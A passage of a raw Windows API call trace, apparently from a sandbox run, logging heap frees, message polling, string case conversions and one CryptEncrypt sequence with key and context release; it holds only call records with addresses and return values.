hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.862] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c6bd8 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.867] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x14980, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x14988) returned 1 [0252.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.867] CharLowerBuffW (in: lpsz="byte[84360]", cchLength=0xb | out: lpsz="byte[84360]") returned 0xb [0252.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.868] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.868] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.868] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.868] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.868] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.868] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c6bd8*, pdwDataLen=0x8bef68*=0x14980, dwBufLen=0x14988 | out: pbData=0x34c6bd8*, pdwDataLen=0x8bef68*=0x14988) returned 1 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.870] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.870] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.870] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.870] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.870] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.871] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.871] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.871] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.871] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.871] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.871] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.871] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.871] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.871] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.877] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.877] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.877] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.881] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.881] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.882] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0252.882] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.882] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0252.882] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.882] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.882] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.882] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.882] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.882] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.882] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.882] CryptDestroyKey (hKey=0xaa5920) returned 1 [0252.882] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.882] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.883] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.883] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.883] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.883] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.883] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.883] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.883] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.883] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.883] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.883] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.883] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.883] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.883] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.883] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.884] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.884] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.884] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.884] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.884] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.884] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.884] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.885] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.885] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.885] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.885] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.885] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.885] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.885] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.885] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.885] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.885] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.885] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.885] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.885] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.885] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.886] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.886] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.886] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.886] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0252.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0252.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0252.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.887] RtlAllocateHeap 